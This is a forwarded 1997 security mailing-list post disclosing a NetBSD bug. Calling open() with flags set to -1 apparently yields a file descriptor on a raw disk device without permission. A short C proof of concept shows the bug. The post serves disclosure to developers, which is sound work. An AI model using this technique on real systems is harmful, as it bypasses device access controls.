i believe this is the original post in it's (more or less) entirety...

>> From: explorer@flame.org
>From best-of-security-request@cyber.com.au  Wed Oct 22 18:00:23 1997
>X-List: from best-of-security-request@cyber.com.au to <best-of-security@lists.graffiti.com> via plum.cyber.com.au
>Resent-Date: Thu, 23 Oct 1997 08:00:11 +1000 (EST)
>Date: 17 Oct 1997 10:42:13 -0000
>Message-ID: <19971017104213.11040.qmail@kechara.flame.org>
>From: explorer@flame.org
>Sender: darrenr@cyber.com.au
>Old-Status: O
>Old-X-Originally-To: To: developers@NetBSD.ORG
>Old-X-Originated-From: From: explorer@flame.org
>Resent-Message-ID: <"4heHGD.A.NVC.gSjT0"@plum>
>X-Loop: best-of-security@cyber.com.au
>Errors-To: best-of-security-request@cyber.com.au
>Precedence: list
>Resent-Sender: best-of-security-request@cyber.com.au
>To: best-of-security@cyber.com.au
>Resent-From: best-of-security@cyber.com.au
>X-Mailing-List: <best-of-security@cyber.com.au> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
>X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request@cyber.com.au with Subject: unsubscribe
>Subject: BoS: Possible SERIOUS bug in open()?
>
>
>This was sent to me recently...  It seems to be a pretty serious hole
>in open() and permissions...
>
>Note, in the following, open() succeeds, and ioctls are probably
>executed...
>
>/*
> * This will give you a file descriptor on a device you should not have
> * access to.  This seems really, really screwed up, since holding a fd
> * lets you do a lot of ioctls that you should not be able to do...
> */
>#include <fcntl.h>
>#include <stdio.h>
>#include <unistd.h>
>#include <err.h>
>
>int
>main(int argc, char **argv)
>{
>  int fd;
>
>  fd = open("/dev/rsd0a", -1, 0);
>
>  if (fd < 0)
>    err(1, "open");
>}
>
>


-- 
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
codewarrior@daemon.org                               that goes *ping*!"
warfare@graffiti.com      * "information is power -- share the wealth."